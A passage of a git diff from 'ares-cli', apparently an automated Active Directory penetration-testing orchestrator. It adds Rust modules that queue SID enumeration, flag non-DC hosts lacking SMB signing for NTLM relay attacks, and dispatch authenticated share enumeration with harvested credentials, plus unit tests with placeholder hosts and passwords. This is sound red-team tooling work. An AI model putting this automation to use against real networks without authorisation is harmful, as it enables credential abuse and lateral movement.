+ + let priority = dispatcher.effective_priority("sid_enumeration"); + match dispatcher + .throttled_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "SID enumeration dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_SID_ENUMERATION, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_SID_ENUMERATION, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(domain = %item.domain, "SID enumeration deferred"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch SID enumeration"); + } + } + } + } +} + +struct SidEnumWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key = format!("sid_enum:{}", "contoso.local"); + assert_eq!(key, "sid_enum:contoso.local"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_SID_ENUMERATION, "sid_enumeration"); + } + + #[test] + fn payload_structure_has_correct_technique() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let payload = json!({ + "technique": "sid_enumeration", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + assert_eq!(payload["technique"], "sid_enumeration"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = SidEnumWork { + dedup_key: "sid_enum:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.credential.username, "admin"); + } + + #[test] + fn dedup_key_normalizes_domain() { + let key = format!("sid_enum:{}", "CONTOSO.LOCAL".to_lowercase()); + assert_eq!(key, "sid_enum:contoso.local"); + } + + #[test] + fn dedup_keys_differ_per_domain() { + let key1 = format!("sid_enum:{}", "contoso.local"); + let key2 = format!("sid_enum:{}", "fabrikam.local"); + assert_ne!(key1, key2); + } + + fn make_credential( + username: &str, + password: &str, + domain: &str, + ) -> ares_core::models::Credential { + ares_core::models::Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn collect_empty_state_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_sid_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_sid_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_domain_with_cred() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_sid_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_skips_domain_with_known_sid() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .domain_sids + .insert("contoso.local".into(), "S-1-5-21-1234".into()); + let work = collect_sid_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_processed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_SID_ENUMERATION, "sid_enum:contoso.local".into()); + let work = collect_sid_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_cross_domain_fallback() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("crossuser", "P@ssw0rd!", "fabrikam.local")); // pragma: allowlist secret + let work = collect_sid_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "crossuser"); + assert_eq!(work[0].credential.domain, "fabrikam.local"); + } + + #[test] + fn collect_skips_empty_password() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "", "contoso.local")); + let work = collect_sid_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_quarantined_credential_skipped() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.quarantine_credential("baduser", "contoso.local"); + let work = collect_sid_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_key_lowercased() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_sid_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "sid_enum:contoso.local"); + } + + #[tokio::test] + async fn collect_via_shared_state() { + let shared = SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_sid_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + } +} diff --git a/ares-cli/src/orchestrator/automation/smb_signing.rs b/ares-cli/src/orchestrator/automation/smb_signing.rs new file mode 100644 index 00000000..909f41f0 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/smb_signing.rs @@ -0,0 +1,279 @@ +//! auto_smb_signing_detection -- bridge recon host data to VulnerabilityInfo. +//! +//! The SMB banner parser (`hosts.rs`) detects `(signing:True)` to mark DCs but +//! does NOT create VulnerabilityInfo objects for hosts with signing disabled. +//! This module scans `state.hosts` for non-DC hosts (signing:False is the default +//! for member servers) and publishes `smb_signing_disabled` vulns, which the +//! `ntlm_relay` module consumes to dispatch relay attacks. +//! +//! Pattern: mirrors `auto_mssql_detection` — scan host list, publish vulns. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::StateInner; + +/// Work item for SMB signing detection. +struct SmbSigningWork { + ip: String, + hostname: String, + domain: String, +} + +fn collect_smb_signing_work(state: &StateInner) -> Vec { + state + .hosts + .iter() + .filter(|h| { + // Non-DC hosts with SMB (port 445) likely have signing disabled. + // DCs enforce signing:True; member servers default to signing not required. + !h.is_dc + && !h.hostname.is_empty() + && !state + .discovered_vulnerabilities + .contains_key(&format!("smb_signing_{}", h.ip.replace('.', "_"))) + }) + .map(|h| { + let domain = h + .hostname + .find('.') + .map(|i| h.hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + SmbSigningWork { + ip: h.ip.clone(), + hostname: h.hostname.clone(), + domain, + } + }) + .collect() +} + +/// Scans discovered hosts for SMB signing disabled (non-DC Windows hosts). +/// DCs enforce signing; member servers typically do not. +/// Interval: 30s. +pub async fn auto_smb_signing_detection( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("smb_signing_disabled") { + continue; + } + + let work = { + let state = dispatcher.state.read().await; + collect_smb_signing_work(&state) + }; + + for item in work { + let vuln = ares_core::models::VulnerabilityInfo { + vuln_id: format!("smb_signing_{}", item.ip.replace('.', "_")), + vuln_type: "smb_signing_disabled".to_string(), + target: item.ip.clone(), + discovered_by: "auto_smb_signing_detection".to_string(), + discovered_at: chrono::Utc::now(), + details: { + let mut d = std::collections::HashMap::new(); + d.insert("target_ip".to_string(), json!(item.ip)); + d.insert("ip".to_string(), json!(item.ip)); + if !item.hostname.is_empty() { + d.insert("hostname".to_string(), json!(item.hostname)); + } + if !item.domain.is_empty() { + d.insert("domain".to_string(), json!(item.domain)); + } + d + }, + recommended_agent: "coercion".to_string(), + priority: dispatcher.effective_priority("smb_signing_disabled"), + }; + + match dispatcher + .state + .publish_vulnerability_with_strategy( + &dispatcher.queue, + vuln, + Some(&dispatcher.config.strategy), + ) + .await + { + Ok(true) => { + info!(ip = %item.ip, hostname = %item.hostname, "SMB signing disabled — vulnerability queued for relay"); + } + Ok(false) => {} // already exists + Err(e) => { + warn!(err = %e, ip = %item.ip, "Failed to publish SMB signing vulnerability") + } + } + } + } +} + +#[cfg(test)] +mod tests { + use super::*; + + fn make_host(ip: &str, hostname: &str, is_dc: bool) -> ares_core::models::Host { + ares_core::models::Host { + ip: ip.to_string(), + hostname: hostname.to_string(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc, + owned: false, + } + } + + #[test] + fn vuln_id_format() { + let ip = "192.168.58.22"; + let vuln_id = format!("smb_signing_{}", ip.replace('.', "_")); + assert_eq!(vuln_id, "smb_signing_192_168_58_22"); + } + + #[test] + fn domain_from_hostname() { + let hostname = "srv01.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "contoso.local"); + } + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_smb_signing_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_non_dc_host_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local", false)); + let work = collect_smb_signing_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].ip, "192.168.58.22"); + assert_eq!(work[0].hostname, "srv01.contoso.local"); + assert_eq!(work[0].domain, "contoso.local"); + } + + #[test] + fn collect_dc_host_skipped() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.10", "dc01.contoso.local", true)); + let work = collect_smb_signing_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_empty_hostname_skipped() { + let mut state = StateInner::new("test-op".into()); + state.hosts.push(make_host("192.168.58.22", "", false)); + let work = collect_smb_signing_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_already_discovered_vuln_skipped() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local", false)); + // Simulate existing vulnerability + state.discovered_vulnerabilities.insert( + "smb_signing_192_168_58_22".into(), + ares_core::models::VulnerabilityInfo { + vuln_id: "smb_signing_192_168_58_22".into(), + vuln_type: "smb_signing_disabled".into(), + target: "192.168.58.22".into(), + discovered_by: "test".into(), + discovered_at: chrono::Utc::now(), + details: std::collections::HashMap::new(), + recommended_agent: "coercion".into(), + priority: 5, + }, + ); + let work = collect_smb_signing_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_multiple_hosts_mixed_dc_and_member() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.10", "dc01.contoso.local", true)); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local", false)); + state + .hosts + .push(make_host("192.168.58.23", "srv02.contoso.local", false)); + let work = collect_smb_signing_work(&state); + assert_eq!(work.len(), 2); + let ips: Vec<&str> = work.iter().map(|w| w.ip.as_str()).collect(); + assert!(ips.contains(&"192.168.58.22")); + assert!(ips.contains(&"192.168.58.23")); + assert!(!ips.contains(&"192.168.58.10")); + } + + #[test] + fn collect_host_without_fqdn_gets_empty_domain() { + let mut state = StateInner::new("test-op".into()); + state.hosts.push(make_host("192.168.58.22", "srv01", false)); + let work = collect_smb_signing_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, ""); + } + + #[test] + fn collect_skips_vuln_keeps_clean() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local", false)); + state + .hosts + .push(make_host("192.168.58.23", "srv02.contoso.local", false)); + // Only 192.168.58.22 has existing vuln + state.discovered_vulnerabilities.insert( + "smb_signing_192_168_58_22".into(), + ares_core::models::VulnerabilityInfo { + vuln_id: "smb_signing_192_168_58_22".into(), + vuln_type: "smb_signing_disabled".into(), + target: "192.168.58.22".into(), + discovered_by: "test".into(), + discovered_at: chrono::Utc::now(), + details: std::collections::HashMap::new(), + recommended_agent: "coercion".into(), + priority: 5, + }, + ); + let work = collect_smb_signing_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].ip, "192.168.58.23"); + } +} diff --git a/ares-cli/src/orchestrator/automation/smbclient_enum.rs b/ares-cli/src/orchestrator/automation/smbclient_enum.rs new file mode 100644 index 00000000..3379d0dc --- /dev/null +++ b/ares-cli/src/orchestrator/automation/smbclient_enum.rs @@ -0,0 +1,745 @@ +//! auto_smbclient_enum -- authenticated SMB share listing per domain. +//! +//! Complements auto_share_enumeration by using authenticated sessions to +//! discover shares that require credentials. Uses smbclient or netexec +//! to list shares on all known hosts. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect SMB enumeration work items from current state. +/// +/// Pure logic extracted from the async loop so it can be unit-tested +/// without a Dispatcher or runtime. +fn collect_smbclient_work(state: &crate::orchestrator::state::StateInner) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for host in &state.hosts { + // Check if host has SMB + let has_smb = host.services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("445") || sl.contains("smb") || sl.contains("cifs") + }); + if !has_smb { + continue; + } + + let dedup_key = format!("smb_auth_enum:{}", host.ip); + if state.is_processed(DEDUP_SMBCLIENT_ENUM, &dedup_key) { + continue; + } + + // Infer domain from hostname + let domain = host + .hostname + .find('.') + .map(|i| host.hostname[i + 1..].to_string()) + .unwrap_or_default(); + + // Pick a credential for this domain + let cred = match state + .credentials + .iter() + .find(|c| { + !domain.is_empty() + && c.domain.to_lowercase() == domain.to_lowercase() + && !c.password.is_empty() + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .or_else(|| { + state.credentials.iter().find(|c| { + !c.password.is_empty() + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + }) { + Some(c) => c.clone(), + None => continue, + }; + + items.push(SmbEnumWork { + dedup_key, + target_ip: host.ip.clone(), + hostname: host.hostname.clone(), + domain, + credential: cred, + }); + } + + items +} + +/// Dispatches authenticated SMB share enumeration per host. +/// Interval: 45s. +pub async fn auto_smbclient_enum(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("smbclient_enum") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + let items = collect_smbclient_work(&state); + if items.is_empty() { + continue; + } + items + }; + + for item in work { + let payload = json!({ + "technique": "authenticated_share_enumeration", + "target_ip": item.target_ip, + "hostname": item.hostname, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("smbclient_enum"); + match dispatcher + .throttled_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + host = %item.target_ip, + "Authenticated SMB share enumeration dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_SMBCLIENT_ENUM, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_SMBCLIENT_ENUM, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(host = %item.target_ip, "SMB auth enum deferred"); + } + Err(e) => { + warn!(err = %e, host = %item.target_ip, "Failed to dispatch SMB auth enum"); + } + } + } + } +} + +struct SmbEnumWork { + dedup_key: String, + target_ip: String, + hostname: String, + domain: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::SharedState; + + /// Helper: create a credential for tests. + fn make_cred(user: &str, pass: &str, domain: &str) -> ares_core::models::Credential { + ares_core::models::Credential { + id: format!("c-{user}"), + username: user.into(), + password: pass.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + /// Helper: create a host with given services. + fn make_host(ip: &str, hostname: &str, services: Vec<&str>) -> ares_core::models::Host { + ares_core::models::Host { + ip: ip.into(), + hostname: hostname.into(), + os: String::new(), + roles: vec![], + services: services.into_iter().map(String::from).collect(), + is_dc: false, + owned: false, + } + } + + // ---- collect_smbclient_work tests ---- + + #[tokio::test] + async fn collect_empty_state_returns_nothing() { + let shared = SharedState::new("op-test".into()); + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_no_credentials_returns_nothing() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp microsoft-ds"], + )); + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_no_smb_hosts_returns_nothing() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "web01.contoso.local", + vec!["80/tcp http", "443/tcp https"], + )); + state + .credentials + .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_single_host_single_cred() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp microsoft-ds"], + )); + state + .credentials + .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.10"); + assert_eq!(work[0].hostname, "dc01.contoso.local"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].dedup_key, "smb_auth_enum:192.168.58.10"); + } + + #[tokio::test] + async fn collect_multiple_hosts() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp microsoft-ds"], + )); + state.hosts.push(make_host( + "192.168.58.20", + "srv01.contoso.local", + vec!["445/tcp smb", "80/tcp http"], + )); + state + .credentials + .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 2); + let ips: Vec<&str> = work.iter().map(|w| w.target_ip.as_str()).collect(); + assert!(ips.contains(&"192.168.58.10")); + assert!(ips.contains(&"192.168.58.20")); + } + + #[tokio::test] + async fn collect_dedup_skips_already_processed() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp microsoft-ds"], + )); + state.hosts.push(make_host( + "192.168.58.20", + "srv01.contoso.local", + vec!["445/tcp smb"], + )); + state + .credentials + .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_SMBCLIENT_ENUM, "smb_auth_enum:192.168.58.10".into()); + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.20"); + } + + #[tokio::test] + async fn collect_prefers_same_domain_credential() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp microsoft-ds"], + )); + state + .credentials + .push(make_cred("fab_user", "Fab123!", "fabrikam.local")); // pragma: allowlist secret + state + .credentials + .push(make_cred("con_user", "Con123!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "con_user"); + } + + #[tokio::test] + async fn collect_falls_back_to_any_credential_when_no_domain_match() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp microsoft-ds"], + )); + state + .credentials + .push(make_cred("fab_user", "Fab123!", "fabrikam.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "fab_user"); + } + + #[tokio::test] + async fn collect_skips_empty_password_credentials() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp microsoft-ds"], + )); + state + .credentials + .push(make_cred("admin", "", "contoso.local")); + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_skips_empty_password_falls_back() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp microsoft-ds"], + )); + state + .credentials + .push(make_cred("admin", "", "contoso.local")); + state + .credentials + .push(make_cred("fab_user", "Fab123!", "fabrikam.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "fab_user"); + } + + #[tokio::test] + async fn collect_bare_hostname_empty_domain() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state + .hosts + .push(make_host("192.168.58.10", "srv01", vec!["445/tcp smb"])); + state + .credentials + .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, ""); + assert_eq!(work[0].credential.username, "admin"); + } + + #[tokio::test] + async fn collect_cifs_service_detected() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "nas01.contoso.local", + vec!["cifs file share"], + )); + state + .credentials + .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 1); + } + + #[tokio::test] + async fn collect_case_insensitive_domain_matching() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.CONTOSO.LOCAL", + vec!["445/tcp smb"], + )); + state + .credentials + .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "CONTOSO.LOCAL"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[tokio::test] + async fn collect_mixed_smb_and_non_smb_hosts() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp microsoft-ds", "88/tcp kerberos"], + )); + state.hosts.push(make_host( + "192.168.58.20", + "web01.contoso.local", + vec!["80/tcp http", "443/tcp https"], + )); + state.hosts.push(make_host( + "192.168.58.30", + "sql01.contoso.local", + vec!["1433/tcp mssql", "445/tcp smb"], + )); + state + .credentials + .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 2); + let ips: Vec<&str> = work.iter().map(|w| w.target_ip.as_str()).collect(); + assert!(ips.contains(&"192.168.58.10")); + assert!(!ips.contains(&"192.168.58.20")); + assert!(ips.contains(&"192.168.58.30")); + } + + #[tokio::test] + async fn collect_all_deduped_returns_nothing() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp smb"], + )); + state.hosts.push(make_host( + "192.168.58.20", + "srv01.contoso.local", + vec!["445/tcp smb"], + )); + state + .credentials + .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_SMBCLIENT_ENUM, "smb_auth_enum:192.168.58.10".into()); + state.mark_processed(DEDUP_SMBCLIENT_ENUM, "smb_auth_enum:192.168.58.20".into()); + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_cross_domain_hosts_get_correct_creds() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp smb"], + )); + state.hosts.push(make_host( + "192.168.58.20", + "dc02.fabrikam.local", + vec!["445/tcp smb"], + )); + state + .credentials + .push(make_cred("con_admin", "ConPass!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_cred("fab_admin", "FabPass!", "fabrikam.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 2); + + let contoso_work = work + .iter() + .find(|w| w.target_ip == "192.168.58.10") + .unwrap(); + assert_eq!(contoso_work.credential.username, "con_admin"); + + let fabrikam_work = work + .iter() + .find(|w| w.target_ip == "192.168.58.20") + .unwrap(); + assert_eq!(fabrikam_work.credential.username, "fab_admin"); + } + + #[tokio::test] + async fn collect_only_empty_password_creds_returns_nothing() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp smb"], + )); + state + .credentials + .push(make_cred("user1", "", "contoso.local")); + state + .credentials + .push(make_cred("user2", "", "fabrikam.local")); + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_host_with_empty_services() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state + .hosts + .push(make_host("192.168.58.10", "dc01.contoso.local", vec![])); + state + .credentials + .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert!(work.is_empty()); + } + + // ---- original tests ---- + + #[test] + fn dedup_key_format() { + let key = format!("smb_auth_enum:{}", "192.168.58.10"); + assert_eq!(key, "smb_auth_enum:192.168.58.10"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_SMBCLIENT_ENUM, "smbclient_enum"); + } + + #[test] + fn smb_service_detection() { + let services = [ + "445/tcp microsoft-ds".to_string(), + "80/tcp http".to_string(), + ]; + let has_smb = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("445") || sl.contains("smb") || sl.contains("cifs") + }); + assert!(has_smb); + } + + #[test] + fn smb_service_detection_by_name() { + let services = ["microsoft-ds smb".to_string()]; + let has_smb = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("445") || sl.contains("smb") || sl.contains("cifs") + }); + assert!(has_smb); + } + + #[test] + fn no_smb_service() { + let services = [ + "3389/tcp ms-wbt-server".to_string(), + "80/tcp http".to_string(), + ]; + let has_smb = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("445") || sl.contains("smb") || sl.contains("cifs") + }); + assert!(!has_smb); + } + + #[test] + fn domain_from_hostname_preserves_case() { + // smbclient_enum uses to_string() not to_lowercase() for domain + let hostname = "srv01.CONTOSO.LOCAL"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_string()) + .unwrap_or_default(); + assert_eq!(domain, "CONTOSO.LOCAL"); + } + + #[test] + fn smb_service_detection_cifs() { + let services = ["cifs share".to_string()]; + let has_smb = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("445") || sl.contains("smb") || sl.contains("cifs") + }); + assert!(has_smb); + } + + #[test] + fn domain_from_bare_hostname() { + let hostname = "srv01"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_string()) + .unwrap_or_default(); + 